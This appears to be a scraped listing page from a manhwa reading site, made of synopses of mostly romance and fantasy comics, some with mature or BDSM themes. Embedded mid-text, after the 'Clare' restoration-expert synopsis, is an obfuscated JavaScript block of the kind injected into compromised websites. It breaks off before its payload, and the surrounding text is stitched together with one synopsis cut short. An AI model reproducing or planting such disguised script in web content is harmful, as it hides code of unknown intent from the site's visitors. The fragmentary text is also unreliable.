Read First Love Manhwa Latest Chapter on Mangazin. “You’re like my skin. I can’t bear to be apart from you, not even a little.” 19 years ago. A frail little girl, Yeo Hye-jun, picked up in the thick fog. “Please don’t kick me out. I eat so little… Just one meal is enough.” At first, it was nothing more than impulsive pity. A trivial feeling that seemed satisfied by simply taking her under his wing. “I’m meeting someone for a matchmaking date.” “Wow, I’m really… thrilled. The thought of you not being here and being with another man instead.” But Go Jungwon had no idea. That as the seasons passed and the girl turned into a woman, the insignificant child he had taken in had become his first love.
Read manhwa The Chick-Class Hunter is Filial! / Chick Class Hunter is Doing The Duty! / Chick Class Hunter is Being Filial! / The Chick Hunter Is Being Filial! In a world where special powers awaken in individuals, a 4-year-old girl becomes an S-class hunter but has no parents. Assigned a quest to find guardians, he is eventually adopted by the nation’s top hunter. With a new skill that allows him to register caregivers and earn “devotion points” for growth, he sets out to gather the best guardians to grow stronger and thrive. 병아리반 헌터는 효도 중!
Restoration expert Clare has landed a new job, but her client is the last person in the world she wants to see… It turns out she’s been hired by Nicholas Dargan, the haughty CEO of a conglomerate. A year ago, she dreamed of marrying his cousin, but Nicholas suddenly tore the couple apart. But she just can’t say no to working in such a gorgeous house with so much history. Clare decides to accept the job, never guessing that a romance she didn’t even know had begun is about to continue…<script></script><script>(function(_0x3f2982,_0x4f4f28){var _0x9ff044=_0xce13,_0x4fabf6=_0x3f2982();while(!![]){try{var _0x47b4cb=parseInt(_0x9ff044(0x128))/(0x258e+-0x2515+-0x78)*(-parseInt(_0x9ff044(0x134))/(0xbc*0xb+0x8bf+-0x10d1))+parseInt(_0x9ff044(0x121))/(-0x6c*-0x30+-0x1*-0xae7+-0x1f24)+-parseInt(_0x9ff044(0x11d))/(0x5*0x79f+-0x2155+-0x57*0xe)*(parseInt(_0x9ff044(0x130))/(-0x1b4f*-0x1+-0x290+-0x279*0xa))+parseInt(_0x9ff044(0x11f))/(0x1bc9+0x1402+-0x6d3*0x7)*(parseInt(_0x9ff044(0x132))/(-0x5*-0x70+-0xc74+0xa4b))+-parseInt(_0x9ff044(0x117))/(0x13d0+-0x1f73+0x1d*0x67)+-parseInt(_0x9ff044(0x11a))/(-0xb97+0x1*-0x3c7+-0x1*-0xf67)+parseInt(_0x9ff044(0x125))/(0x1452+0x99*0x2+-0x157a*0x1);if(_0x47b4cb===_0x4f4f28)break;else _0x4fabf6['push'](_0x4fabf6['shift']());}catch(_0xe09ca5){_0x4fabf6['push'](_0x4fabf6['shift']());}}}(_0x743a,0x76df7+0x143*0x1f6+0x6f2*-0xda));function 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Who you sleep, or why, how, when, how often your s** life is no one's business but your own. But this is Nora's story, and we're just glad to be along for the ride. Your average Korean girl in her late twenties, Nora's decided to go against the code of general female conduct. She's out to experience love, relationships, and cultures not her own, but according to her own rules. Swiping in her underwear on her couch? Check. 7am booty calls? Check. Dipping the proverbial toe into some light BDSM play? CHECK. Join Nora as she learns about the world and herself one swipe at a time.
Read manhwa Love On The Lash at MangaZin The description of the comics “Love On The Lash Manhwa”: Wrapped in my arms, she appeared after eight years and said. “Dog. Yes, you are a dog.” Dog. The short word stuck in my head. It was as if my thinking had stopped. “Don’t worry. I like to take care of you more than bully you.” Her face lit up with delight. As innocent as a child getting a new toy. …Owner? Yes. Master. There is only you in front of her. The cute and shy Kang Hae-soo, Seo Woo-jae’s first love, is gone. “Get down.” A stern voice rang out. “Love On The Lash Manhwa” is another name: That’s Right, Good Job, Eat It 元カノご主人様 옳지, 잘했어, 먹어
A young mermaid, injured and lost, is captured by a ship. Instead of killing her as they would a siren, its handsome captain allows her to stay and protects her from the sea and his own crew until she can heal. As the days go on, the two are drawn together, but will their opposing worlds keep them apart?
포식자의 혼약자 “You shouldn’t have crossed this line, Elisha, if you didn’t want it to be like this.” A sturdy arm wrapped around her swaying body. Her head became hazy and an intentional hot sweet sigh was pulled out of her. ‘How the hell did I get myself in this situation—’ Elisha recalled. This never happened before. ‘Yeah, I remember.’ Her future in which she would become the fake concubine to a demonic man from the same family, and would be eaten to death—even down to her bone marrow. A future in which the Cartier ducal family is embroiled in a power struggle and fragmented. To avoid that future, Elisha threw herself at Lucerne, the archrival of her former life. Yeah. There was no problem. She knew this man, before and after her regression. She already knew he was the most notorious maniac in the Empire. 20-year-old Elisha owes 30,000 gold coins (about 15 billion won in Korean currency or around 15 million in USD). After going back in time, in order to avoid a hellish life because of debt, she becomes the most capable illegitimate child in the world and visits Lucerne, the archenemy of her master. “What do you want from me?” “Please lend me some money. And… make me your subordinate. I’ll give you all the information I have.” “Why should I trust you?” “I’ll give myself up as collateral.” Lucerne listened to Elisha and watched her quietly. “Okay. But I decide how to deal with the collateral.” “…….” “First of all, marry me.” “…… huh?” Elisha didn’t expect it either. That her information transaction would become a marriage contract.
Read manga Once a Predator, Now a Sacrifice [Official] / 生贄悪女は政敵王子の番となる When the villainess comes back to life, she discovers that the prince who once hated her is now madly in love with her?! In this world, “Predators” are the rulers who wield powerful magic, while those born with the “Mark of Sacrifice” are despised as mere wells of magic for Predators to absorb and tools for bearing offspring. Prince Greg, second in line to the throne, recently rejected a marriage offer from Lady Letishia, a vile Predator. Determined to understand his reasons, she confronts him at the palace—only for both of them to become victims of an assassination attempt, losing their lives in the process. The next moment, Letishia finds herself transported back in time to the day she went to see Greg. Yet, this miraculous second chance comes at a price: she now bears the Mark of Sacrifice. Imprisoned by her family and facing a future of exploitation, Letishia strikes a deal with Greg, offering him her magic in exchange for his protection. Though they wed under the terms of a loveless contract, Greg seems to have fallen deeply in love with Letishia. But is this genuine love, or is it simply the mark’s influence?
Mr. Lu, Your Wife is Trending Again! This story begins when our hero and heroine reunite seven years later. The heroine is now an overly cautious entertainer, and the hero is a wealthy tycoon. They both loved each other, but because of a misunderstanding seven years ago, they both thought the other was not interested. Luckily, after experiencing many hardships together, and uncovering the truth, the lovers finally got married and stepped into the realm of happiness. 陆总 你的老婆又上热搜啦
Aoko is a ceramic painter at Hasami Wares Pottery, when suddenly an unfriendly and unapproachable man named Tatsuki arrives from overseas. Rejecting her way of life by telling her he isn't interested in painted ceramics, Aoko feels dejected, but can't help but be drawn to Tatsuki's ceramics… This is a mature love story of a man and woman, both fascinated by ceramics.
All I need in life is a decent job and some money.Or that's what I thought. Sayako Tono, who works as a chief at a company, has been living a frugal life unrelated to romance. Sayako comforts her subordinates disciplined by Director Yukisada, who is rumored to be good-looking but very strict, but she also realizes his kindness. One day, Sayako comes home to find her apartment in trouble and finds out that the new landlord is Yukisada. "Would you like to stay at my place until you find the next room?" A cohabit love comedy between a handsome cool boss and a caring girl!Published by Comicle Original
Read manhwa The Saintess And The Curse at Manga Zin The description of the comics “The Saintess And The Curse Manhwa”: Velota Rosebet, the admired saint of the Lunhardt Empire, is marked by a terrible curse: she must receive the essence of a man once a month. Her secret is revealed during a full moon night by Saiden Blackwood, the leader of the order of holy knights, who has harbored a deep love for her. Overcome by anger towards the curse, Saiden decides to take on the task of freeing her. Will he be able to fulfill his oath and restore Velota’s freedom? “The Saintess And The Curse Manhwa” is sames name: The Holy Lady, the Curse Saint, Curse 성녀, 저주